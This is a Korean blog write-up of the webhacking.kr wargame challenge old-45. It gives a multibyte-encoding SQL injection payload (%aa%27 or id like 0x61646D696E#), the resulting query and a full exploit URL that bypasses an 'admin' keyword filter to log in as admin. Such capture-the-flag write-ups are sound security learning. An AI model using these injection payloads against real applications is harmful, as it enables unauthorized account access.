https://webhacking.kr/challenge/web-22/
소스 코드
45번 문제도 50번 문제와 동일하게 mb_convert_encoding() 함수를 사용하고 있다.
mb_convert_encoding() 취약점을 활용하여 쿼리문을 조작하면 될 것 같다.
단, 50번 문제와 다른 점은 admin 이라는 글자가 포함되면 안된다는 것이다.
admin 키워드를 우회하기 위해서는 reverse("nimda"), 0x61646D696E 등 여러 방법들이 존재한다.
이 문제에서는 0x61646D696E 를 활용하면 될 것 같다.
id : %aa%27 or id like 0x61646D696E#
pw : guest
select id from chall45 where id='' or id like 0x61646D696E#' and pw=md5('guest')
위와 같이 입력을 준다면, admin 계정으로 로그인 되도록 쿼리를 조작할 수 있게 된다.
https://webhacking.kr/challenge/web-22/?id=%aa%27%20or%20id%20LIKE%200x61646D696E%23&pw=guest
'Web Security > webhacking.kr' 카테고리의 다른 글
[Webhacking.kr] old-08 (0) | 2023.06.18 |
---|---|
[Webhacking.kr] old-50 (0) | 2023.05.27 |
[Webhacking.kr] old-24 (0) | 2023.05.19 |
[Webhacking.kr] old-21 (0) | 2021.08.01 |
[Webhacking.kr] old-20 (0) | 2021.08.01 |